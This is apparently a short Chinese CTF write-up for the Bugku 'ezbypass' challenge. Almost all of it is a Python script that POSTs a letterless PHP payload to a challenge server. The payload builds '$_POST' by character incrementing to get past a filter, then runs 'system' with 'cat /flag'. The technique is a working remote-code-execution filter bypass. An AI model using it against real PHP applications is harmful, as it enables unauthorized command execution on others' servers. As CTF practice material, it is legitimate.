bugku ezbypass 脚本,原理请参考:
https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501
或 https://blog.csdn.net/qq_36292543/article/details/136623586

脚本如下:
import requests
url = "http://117.72.52.127:14448/"
data = {
'code':"$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);",
"_":"system",
"__":"cat /flag"
}
print(requests.post(url,data=data,json=data).text)




